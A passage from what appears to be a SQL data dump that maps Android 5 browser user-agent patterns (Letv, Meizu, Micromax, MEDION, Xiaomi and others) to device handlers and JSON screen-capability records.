Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Letv X500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Letv X501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Linx A400 3G LT4001PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; London) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M-PPxG510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M-PPxG515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M-PPxG551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M-PPxS510L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M-PPxS531) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M-PPxS552U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M-PPxX525U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M-PPxX530U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M3s) AppleWebKit/* (KHTML, like Gecko) Chrome (beta) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M3s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M4 SS4451) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M4 SS4456) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M5 mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M500-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M555) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M572) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M631Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; M9mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MEDION B5530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MEDION E4503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MEDION E4504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MEDION E5001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MEDION E5004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MEDION E5020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MEDION X5004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MEDION X5020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MI 4S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MI NOTE Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MI PAD 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MOS1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MOT-A6020l37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MS453) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MS45S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MS50M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MS50_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MS55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MSP4507) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MT2L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MTC SMART Sprint 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mtc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MTN-L860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MTN-S620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MTN-S730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MWG 549 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MX4 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MX4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MX5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MZ-M3s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MZ-MX5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MZ-m2 note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MZ-m2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MZ-m3 note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; MZ-m3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Maad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Mi-4c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax A107) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax AQ5001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax D340) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax E313) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax E451) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax E484) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax E485) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q301) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q326) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q334) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q338) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q340) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q345) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q346) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Micromax Q372) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 